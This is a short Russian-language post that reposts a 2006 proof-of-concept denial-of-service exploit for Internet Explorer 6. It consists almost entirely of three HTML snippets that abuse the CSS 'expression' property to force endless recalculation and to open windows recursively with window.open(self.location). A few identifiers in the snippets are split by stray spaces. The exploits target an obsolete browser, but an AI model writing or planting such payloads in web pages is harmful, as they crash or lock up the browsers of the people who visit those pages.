Свежие баги в IE..
Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)

Автор: José Carlos Nieto Jarquín
Дата: Ср. 6 Дек. 2006 11:01

Tested under Windows XP SP2, MSIE 6.0.2900.2180

Exploit 1
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWi dth+'px');">
<tr><td></td></tr>
</table>
</div>

Exploit 2
<div style="width: expression(window.open(self.location));">

</div>

Exploit 3
<html>
<head>
<title>Another non-standards compliant IE D.O.S.</title>
</head>
<body>
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(parseInt(window.open(self.location))+do cument.getElementById('foo').offsetWidth+'px');">
<tr>
<td>
IE makes my life harder . It sucks, don't use it .
</td>
</tr>
</table>
</div>
Written by <a href="http://xiam.be">xiam</a>.<br />
Tested under IE 6.0.2900.2180
</body>
</html>